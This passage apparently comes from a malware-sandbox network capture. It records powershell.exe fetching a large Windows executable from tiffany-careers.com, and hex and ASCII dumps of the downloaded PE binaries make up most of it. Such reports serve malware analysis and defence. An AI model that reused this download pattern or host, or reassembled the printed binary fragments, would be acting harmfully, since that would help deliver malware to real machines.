                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
                                                                        2024-12-27 08:05:26 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47
                                                                        Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D*PG9*PG
                                                                        2024-12-27 08:05:26 UTC16384INData Raw: c0 48 8d 45 20 48 8b d6 4c 8d 45 28 48 89 44 24 20 e8 5e f5 ff ff 85 c0 0f 88 96 70 04 00 48 8d 4d c0 e8 55 54 00 00 44 8b 45 20 e9 00 ff ff ff 48 8d 0d f9 ba 0e 00 e8 5c 09 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 73 38 49 8b e3 41 5f 41 5e 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 70 41 8b 18 45 33 db ff cb 44 89 5d c8 4c 8b d1 89 5d b4 49 8b f8 4c 89 5d d0 c7 45 d8 01 00 00 00 41 8b cb 44 89 5d e0 45 8a cb 4c 89 5d e8 c7 45 f0 01 00 00 00 c7 45 b0 02 00 00 00 44 8b 07 41 8b d0 41 8d 40 01 89 07 e8 75 06 00 00 48 85 c0 74 2c 45 84 c9 75 27 48 8b 40 08 48 8b 10 66 44 39 5a 08 75 d7 8b 12 83 ea 0b 74 4f 83 fa 01 75 cb 85 c9 75 42 44 8a ca 44 89 45 b8 eb be 49 8d 8a 68 02 00 00 48 8d 55 b0 e8 98 07 00 00 8d 43 01 48 8d 4d e0 89 07 e8 de
                                                                        Data Ascii: HE HLE(HD$ ^pHMUTDE H\3L\$pI[0Is8IA_A^]H\$H|$UHHpAE3D]L]IL]EAD]EL]EEDAA@uHt,Eu'H@HfD9ZutOuuBDDEIhHUCHM
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 84 24 88 00 00 00 89 74 24 50 4d 8b c5 48 89 44 24 48 8b d7 8b 84 24 18 01 00 00 89 44 24 40 8b 84 24 20 01 00 00 89 44 24 38 8b 44 24 60 89 5c 24 30 44 89 74 24 28 89 44 24 20 e8 5c 00 00 00 48 8b b4 24 28 01 00 00 8b d8 48 8b ce e8 8e 87 00 00 48 8b ce c7 46 10 01 00 00 00 89 1e e8 59 73 00 00 85 c0 0f 84 71 49 04 00 83 ff 1d 74 08 49 8b cd e8 ac bf 01 00 45 33 f6 48 8d 4c 24 70 e8 5b 87 00 00 41 8b c6 48 81 c4 c8 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 48 8b c4 48 89 58 20 4c 89 40 18 48 89 48 08 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 c1 48 81 ec 90 00 00 00 8b 3d e1 80 0e 00 45 33 ed 41 8b d9 44 8b fa 83 fa 0c 0f 84 33 49 04 00 83 fa 0d 7e 1b 83 fa 0f 0f 8e 25 49 04 00 83 fa 11 0f 84 1c 49 04 00 83 fa 14 0f 84 13 49 04 00 83 ff ff 0f 84 36
                                                                        Data Ascii: $t$PMHD$H$D$@$ D$8D$`\$0Dt$(D$ \H$(HHFYsqItIE3HL$p[AHA_A^A]A\_^][HHX L@HHUVWATAUAVAWHhH=E3AD3I~%III6
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: c1 89 83 c8 00 00 00 3b 53 1c 0f 8d e6 42 04 00 4c 63 9d 58 01 00 00 41 3b d3 0f 8f eb 42 04 00 8b 43 18 48 8b 7b 10 41 2b c1 49 63 d0 8b 04 87 89 04 97 41 8d 40 01 48 8b 7c 24 48 49 8b d7 48 2b 93 98 00 00 00 48 d1 fa 48 63 c8 48 8b 43 10 89 14 88 8b 95 48 01 00 00 45 3b d8 0f 8f 8e fb ff ff 45 8d 58 02 44 89 9d 58 01 00 00 e9 7e fb ff ff 83 ff 10 0f 85 39 03 00 00 8b 95 48 01 00 00 49 83 c6 06 e9 af fa ff ff 49 83 c6 02 83 c7 ab 49 8b ce 40 f6 c7 01 74 06 41 bd 01 00 00 00 46 0f be 9c 1f f8 80 0c 00 8b c7 48 8d 3d 4e 33 ff ff 44 89 5c 24 58 44 0f be 94 38 e8 80 0c 00 44 89 54 24 50 45 85 d2 75 0c b8 ff ff ff 7f 44 8b d0 89 44 24 50 bf 01 00 00 00 45 0f b7 0e 4c 8d 71 02 44 89 4c 24 54 41 8d 41 f1 83 f8 01 0f 86 da 6d 04 00 48 c7 c0 ff ff ff ff 8b c8 89
                                                                        Data Ascii: ;SBLcXA;BCH{A+IcA@H|$HIH+HHcHCHE;EXDX~9HIII@tAFH=N3D\$XD8DT$PEuDD$PELqDL$TAAmH
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 00 00 49 8b 0c df 49 8b d5 e8 16 40 01 00 49 89 3c df 48 ff c3 49 3b de 72 e8 4c 8b 6c 24 48 e9 cf fa ff ff 4c 8d 3d d5 f3 fe ff 49 8b 5c fd 00 48 85 db 74 61 48 8b 73 08 48 85 f6 74 36 48 8b 46 18 ff 08 48 8b 46 18 44 39 30 75 16 48 8b 0e e8 cf 3f 01 00 48 8b 4e 18 ba 04 00 00 00 e8 c1 3f 01 00 ba 20 00 00 00 48 8b ce e8 b4 3f 01 00 4c 89 73 08 8b 43 10 83 f8 05 0f 8d f6 00 00 00 b8 01 00 00 00 44 89 33 48 8b cb 89 43 10 8d 50 17 e8 8e 3f 01 00 4d 89 74 fd 00 48 ff c7 49 3b fc 72 88 e9 62 fa ff ff 44 8b 5c 24 40 45 33 c0 48 8b 9d a8 00 00 00 e9 ac f6 ff ff 41 83 e9 01 0f 88 dd fa ff ff 41 ff c2 41 ff c0 e9 a0 fa ff ff 48 8b 9d b0 00 00 00 48 8b cb c6 00 00 e8 fd 06 00 00 49 8b c7 89 43 10 33 c0 89 03 e9 93 f8 ff ff 49 8b 0a 48 8b 17 48 85 c0 74 20 44 0f
                                                                        Data Ascii: II@I<HI;rLl$HL=I\HtaHsHt6HFHFD90uH?HN? H?LsCD3HCP?MtHI;rbD\$@E3HAAAHHIC3IHHt D
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: e8 db c7 ff ff 48 8d 15 94 9e 0d 00 49 8b cc e8 dc 05 00 00 c6 44 24 51 00 e9 86 fd ff ff 80 7c 24 51 00 0f 85 89 aa 04 00 49 8b dc e9 93 fd ff ff 44 8b 6c 24 40 4c 8b 64 24 48 4c 8b 74 24 38 4c 89 64 24 58 4c 89 b5 88 00 00 00 45 85 ed 0f 84 c6 b6 04 00 41 83 fd 01 0f 85 d0 b6 04 00 49 8b d6 48 8d 4d 90 48 c7 45 98 00 00 00 00 e8 7d 05 00 00 48 8d 4d 90 e8 3c fe fe ff 84 c0 0f 85 75 02 00 00 83 fb 07 75 62 48 8b 55 78 4d 8b c7 e8 9b 94 00 00 85 c0 0f 88 f3 b8 04 00 83 fb 08 0f 84 a2 b6 04 00 41 83 fd 01 0f 85 b5 b6 04 00 49 8b de 48 8b cb e8 25 c7 ff ff c6 03 00 80 7c 24 34 00 c7 43 10 09 00 00 00 0f 85 ae b6 04 00 80 7d 88 00 0f 84 c6 b6 04 00 b0 01 48 ff cf 88 45 89 48 89 7c 24 78 88 44 24 34 48 8d 4d 90 e8 ec c6 ff ff 48 8b 7d 78 e9 fe ef ff ff 83 f8
                                                                        Data Ascii: HID$Q|$QIDl$@Ld$HLt$8Ld$XLEAIHMHE}HM<uubHUxMAIH%|$4C}HEH|$xD$4HMH}x
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 8d 05 6a eb 06 00 48 89 45 f0 48 8d 05 5f fb 09 00 48 89 05 d8 2f 0d 00 48 8d 05 41 ec 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 7a 2f 0d 00 c7 05 5c 2f 0d 00 01 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 d1 04 0a 00 48 89 05 ca 2f 0d 00 48 8d 05 4b f0 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 6c 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f5 05 0a 00 48 89 05 c6 2f 0d 00 48 8d 05 c7 f1 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 68 2f 0d 00 66 c7 05 ff 2e 0d 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 b8 ef 09 00 48 89 05 b9 2f 0d 00 48 8d 05 fe f3 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 5b 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f4 05 0a 00 48 c7 45 f8 00 00 00 00 0f 11 05 65 2f 0d 00 48 89 05 a6 2f 0d 00 48 8d 05 bb 5a 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 a0 f7 09
                                                                        Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45
                                                                        Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48
                                                                        Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80
                                                                        Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.849722147.45.49.1554434268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-27 08:05:33 UTC170OUTGET /ALGglt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: tiffany-careers.com
                                                                        Connection: Keep-Alive
                                                                        2024-12-27 08:05:34 UTC397INHTTP/1.1 200 OK
                                                                        etag: "da2a8-676a89c2-23c51;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:15:30 GMT
                                                                        content-length: 893608
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:33 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 03 03 04 55 8b ec 56 8b f1 e8 b2 01 00 00 8a 45 08 88 06 8b c6 c7 46 0c 09 00 00 00 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 53 56 57 8b f9 89 7d f8 e8 a5 fb ff ff 8b 37 8b ce e8 04 fa ff ff 8b 06 8b 5d 08 c7 80 10 02 00 00 00 00 00 00 8b 5b 08 89 5d f4 85 db 0f 84 b2 00 00 00 53 6a 01 ff 37 e8 cd f8 ff ff 83 c4 0c 33 f6 85 db 0f 84 9b 00 00 00 8b 45 08 6a 10 8b 40 04 8b 1c b0 e8 56 c3 01 00 8b f8 83 c4 04 85 ff 74 7e 8b 0b 89 0f 8b 4b 04 89 4f 04 8b 4b 08 89 4f 08 8b 43 0c 89 47 0c ff 00 8b 5d f8 8d 45 e4 56 6a 01 50 ff 33 89 7d ec c7 45 f0 04 00 00 00 e8 04 f7 ff ff 83 c4 10 85 ff 74 21 8b 47 0c ff 08 8b 47 0c 83 38 00 0f 84 34 8d 03 00 57 e8 72 c3 01 00 83 c4 04 c7 45 ec 00 00 00 00 46 c7 45 f0 01 00 00 00 c7 45 e4
                                                                        Data Ascii: UVEF^]U SVW}7][]Sj73Ej@Vt~KOKOCG]EVjP3}Et!GG84WrEFEE
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 13 ca 99 3b 45 fc 0f 85 a9 88 03 00 3b d1 0f 85 a1 88 03 00 8b 45 ec 89 03 8b 55 d8 89 55 fc 8b 4b 08 85 c9 0f 85 d4 88 03 00 8b 4d e0 85 c9 0f 85 e1 88 03 00 8b 45 e4 83 f8 05 0f 8d ed 88 03 00 d9 ee dd 55 d8 c7 45 e4 03 00 00 00 8b 4e 0c 8b c1 c1 e0 06 8b 80 14 5f 4a 00 83 f8 03 0f 85 6c 89 03 00 83 f9 01 0f 85 18 8a 03 00 db 06 de d9 df e0 f6 c4 05 0f 8b 8d 89 03 00 8b 4f 1c 8b c1 c1 e0 04 03 43 0c 8b 04 85 08 5f 4a 00 83 f8 01 0f 85 93 00 00 00 83 f9 01 0f 85 6a 8b 03 00 8b 47 10 89 45 fc 8b f0 8b 43 0c 83 f8 01 0f 85 f9 8b 03 00 8b 03 3b f0 7c 29 8b 4f 04 8b 45 0c 41 89 08 8b 4d e0 85 c9 0f 85 89 8c 03 00 8b 45 e4 83 f8 05 0f 8d 8f 8c 03 00 5f 5e 5b 8b e5 5d c2 08 00 8b 75 f8 81 c6 5c 01 00 00 80 7e 09 00 0f 85 45 8c 03 00 80 7e 08 00 75 5f 8b 7e 04
                                                                        Data Ascii: ;E;EUUKMEUEN_JlOC_JjGEC;|)OEAME_^[]u\~E~u_~
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 93 00 00 00 e9 cf 7c 03 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 b2 7c 03 00 8b 45 f8 48 4e 83 7d 94 00 89 45 f8 74 2e 8d 4d 94 e8 51 34 01 00 8d 4d 94 8b 18 e8 55 34 01 00 8b 45 f8 85 c0 78 08 3b f3 0f 84 1d fd ff ff 57 6a 78 e9 88 7c 03 00 8d 5e 01 eb 9d 8d 5e 01 eb e2 8d 5e 01 e9 45 fd ff ff 8d 5e 01 e9 17 fe ff ff 8b ff a9 c8 40 00 b3 48 44 00 5e cb 40 00 6e cb 40 00 41 ca 40 00 9b cb 40 00 09 cc 40 00 80 cb 40 00 cf cb 40 00 4f c9 40 00 70 c9 40 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 1c 53 56 57 8b 7d 08 33 f6 ba 01 00 00 00 89 74 24 18 89 74 24 20 8b d9 89 54 24 24 8b 47 04 89 74 24 10 8b 00 89 44 24 14 0f bf 40 08 83 f8 33 75 28 57 e8 a0 cf ff ff 8b 4c 24 20 85 c9 75 3c 8b 74 24 18 8b 54 24 24 83 fa 05 0f 8d a8 7c 03 00 5f 5e 5b 8b e5 5d
                                                                        Data Ascii: |AjYf9H|EHN}Et.MQ4MU4Ex;Wjx|^^^E^@HD^@n@A@@@@@O@p@USVW}3t$t$ T$$Gt$D$@3u(WL$ u<t$T$$|_^[]
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 00 00 8b 5d 10 33 c0 6a ff 50 8b cb c6 45 cf 00 89 45 a0 e8 69 0d 00 00 83 7d 0c 00 75 04 c6 45 cf 01 8d 4d d0 e8 dd 05 00 00 8d 4d b4 e8 d5 05 00 00 33 d2 33 f6 89 55 c4 89 75 f0 8d 64 24 00 80 7d cf 00 0f 84 bf df 03 00 83 7f 14 00 0f 84 89 03 00 00 80 7f 10 00 0f 84 7f 03 00 00 83 fa ff 0f 84 76 03 00 00 8b 4f 1c 3b d1 0f 8f 6b 03 00 00 ff 77 24 8b 47 34 ff 77 20 0b 47 2c 50 52 8b 57 18 51 ff 37 8b 4f 14 e8 12 ea ff ff 8b c8 83 c4 18 89 4f 28 85 c9 0f 8e 30 03 00 00 8b 47 20 8b 50 04 c7 47 2c 00 00 00 00 8b 18 3b 58 04 89 5d c8 8b 5d 10 0f 84 5c df 03 00 89 55 c4 85 c9 0f 84 16 03 00 00 8b 47 20 8b 30 8b 45 f0 2b f0 0f 84 a3 02 00 00 8b 4f 04 3b c1 0f 83 98 02 00 00 83 fe ff 0f 84 2c 03 00 00 03 c6 3b c1 0f 87 1f 03 00 00 8b 4d c0 8b 01 83 f8 01 0f 8f
                                                                        Data Ascii: ]3jPEEi}uEMM33Uud$}vO;kw$G4w G,PRWQ7OO(0G PG,;X]]\UG 0E+O;,;M
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: b8 00 47 3b 7e 08 73 e0 eb e5 56 8b f1 c7 06 c4 09 49 00 e8 c5 ff ff ff ff 76 04 e8 3c c4 00 00 59 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b d9 57 33 ff 39 7b 08 76 40 56 8d 64 24 00 8b 73 04 8b 34 be 85 f6 74 16 8b 46 0c ff 08 8b 46 0c 83 38 00 74 29 56 e8 ff c3 00 00 83 c4 04 8b 43 04 c7 04 b8 00 00 00 00 47 3b 7b 08 72 d0 c7 43 08 00 00 00 00 5e 5f 5b c3 89 7b 08 eb f8 ff 36 e8 d5 c3 00 00 ff 76 0c e8 cd c3 00 00 83 c4 08 eb c3 55 8b ec 56 8b f1 8b 46 0c 39 46 08 75 2f 8d 0c 00 6a 08 58 3b c8 73 5f 57 33 c9 89 46 0c 6a 04 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 22 c3 00 00 83 7e 04 00 8b f8 59 75 42 89 7e 04 5f 6a 10 e8 0e c3 00 00 8b d0 59 85 d2 74 51 8b 45 08 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 40 0c 89 42 0c ff 00 8b 4e 08 8b 46
                                                                        Data Ascii: G;~sVIv<Y^SW39{v@Vd$s4tFF8t)VCG;{rC^_[{6vUVF9Fu/jX;s_W3FjZQ"~YuB~_jYtQEHJHJ@BNF
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 05 f4 2b 4c 00 38 04 47 00 c7 05 f8 2b 4c 00 00 00 00 00 c7 05 fc 2b 4c 00 00 00 00 00 c7 05 00 2c 4c 00 02 00 00 00 c7 05 04 2c 4c 00 02 00 00 00 c6 05 08 2c 4c 00 00 c7 05 0c 2c 4c 00 08 15 49 00 c7 05 18 2c 4c 00 94 04 47 00 c7 05 1c 2c 4c 00 00 00 00 00 c7 05 20 2c 4c 00 00 00 00 00 c7 05 24 2c 4c 00 02 00 00 00 c7 05 28 2c 4c 00 02 00 00 00 c6 05 2c 2c 4c 00 00 c7 05 30 2c 4c 00 28 15 49 00 c7 05 3c 2c 4c 00 f0 04 47 00 c7 05 40 2c 4c 00 00 00 00 00 c7 05 44 2c 4c 00 00 00 00 00 c7 05 48 2c 4c 00 02 00 00 00 c7 05 4c 2c 4c 00 02 00 00 00 c6 05 50 2c 4c 00 00 c7 05 54 2c 4c 00 4c 15 49 00 c7 05 60 2c 4c 00 30 05 47 00 c7 05 64 2c 4c 00 00 00 00 00 c7 05 68 2c 4c 00 00 00 00 00 c7 05 6c 2c 4c 00 02 00 00 00 c7 05 70 2c 4c 00 03 00 00 00 c6 05 74 2c 4c
                                                                        Data Ascii: +L8G+L+L,L,L,L,LI,LG,L ,L$,L(,L,,L0,L(I<,LG@,LD,LH,LL,LP,LT,LLI`,L0Gd,Lh,Ll,Lp,Lt,L
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: cb 41 00 a6 cb 41 00 9d 12 45 00 ba 12 45 00 71 cb 41 00 ae cb 41 00 61 12 45 00 6e 12 45 00 ef 12 45 00 ff 12 45 00 0d 13 45 00 27 13 45 00 b4 cb 41 00 55 8b ec 83 ec 10 53 8b d9 89 4d f0 56 33 c9 57 8b fa 41 89 7d f4 33 d2 89 4d f8 0f b7 03 8d 73 04 b9 85 00 00 00 c7 45 fc 01 00 00 00 66 3b c1 0f 84 c8 00 00 00 83 c1 05 66 3b c1 0f 84 bc 00 00 00 b9 86 00 00 00 66 3b c1 0f 84 ae 00 00 00 83 c1 05 66 3b c1 0f 84 a2 00 00 00 0f b7 06 3d a1 00 00 00 0f 87 e4 00 00 00 0f b6 80 0f ce 41 00 ff 24 85 8b cd 41 00 ff 75 08 ff 75 0c 52 8d 56 02 8b cf e8 f5 01 00 00 83 c4 0c 33 d2 8b 4d f8 8b 5d f0 6a 77 0f b7 43 02 8d 1c 43 58 89 5d f0 66 39 03 0f 84 71 ff ff ff 8b c1 5f 5e 5b 8b e5 5d c3 66 83 3e 70 8b ca 0f 84 ea 47 03 00 8d 4e 02 83 c6 22 85 c9 74 12 6a 20 8b
                                                                        Data Ascii: AAEEqAAaEnEEEE'EAUSMV3WA}3MsEf;f;f;f;=A$AuuRV3M]jwCCX]f9q_^[]f>pGN"tj
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 33 41 fe ff 8d 45 e8 50 ff 77 08 e8 1a 34 ff ff ff 75 e8 68 a8 2c 49 00 56 e8 e7 3e 00 00 83 c4 0c 89 45 f8 80 7d ff 00 0f 85 12 5d 03 00 8d 4d e8 e8 80 10 ff ff 8b 7d f8 56 e8 8b 40 00 00 59 83 fb ff 74 19 53 56 e8 ba 3c 00 00 59 50 e8 e1 3a 00 00 59 59 8b c7 5f 5e 5b 8b e5 5d c3 68 00 40 00 00 eb e1 55 8b ec 51 51 56 57 8b f9 c7 45 f8 01 00 00 00 33 c0 8b f2 88 45 ff 85 ff 74 74 8b 06 0f b7 04 47 50 e8 e1 2b 00 00 59 85 c0 75 67 8b 0e 33 d2 53 8b 5d 08 0f b7 04 4f 89 13 83 e8 2b 74 5c 48 48 74 54 8b 06 66 39 14 47 74 32 8b 06 0f b7 04 47 50 e8 d3 31 00 00 59 85 c0 74 21 6b 03 0a 8b 16 c6 45 ff 01 0f b7 0c 57 83 c0 d0 03 c1 8d 4a 01 89 03 33 c0 89 0e 66 39 04 4f 75 ce 8b 0b 0f af 4d f8 8a 45 ff 89 0b 5b 5f 5e 8b e5 5d c3 32 c0 eb f6 ff 06 eb 84 83 4d f8
                                                                        Data Ascii: 3AEPw4uh,IV>E}]M}V@YtSV<YP:YY_^[]h@UQQVWE3EttGP+Yug3S]O+t\HHtTf9Gt2GP1Yt!kEWJ3f9OuME[_^]2M
                                                                        2024-12-27 08:05:34 UTC16384INData Raw: 00 8b c3 e8 6d 3f 00 00 c3 8b 5d e4 8b 7d 08 57 e8 98 22 00 00 59 c3 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 fb 00 00 00 59 eb 2f 56 e8 2c 00 00 00 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 bc fc ff ff 50 e8 26 a4 00 00 f7 d8 59 59 1b c0 eb 02 33 c0 5e 5d c3 55 8b ec 53 56 8b 75 08 33 db 8b 46 0c 24 03 3c 02 75 42 f7 46 0c 08 01 00 00 74 39 57 8b 3e 2b 7e 08 85 ff 7e 2e 57 ff 76 08 56 e8 79 fc ff ff 59 50 e8 22 8e 00 00 83 c4 0c 3b c7 75 0f 8b 46 0c 84 c0 79 0f 83 e0 fd 89 46 0c eb 07 83 4e 0c 20 83 cb ff 5f 8b 4e 08 8b c3 83 66 04 00 89 0e 5e 5b 5d c3 6a 01 e8 5b 00 00 00 59 c3 6a 0c 68 30 cc 4b 00 e8 5a 3e 00 00 33 ff 89 7d e4 8b 75 08 85 f6 75 09 57 e8 3b 00 00 00 59 eb 24 56 e8 4d 21 00 00 59 89 7d fc 56 e8 1c ff ff ff 59 8b f8 89
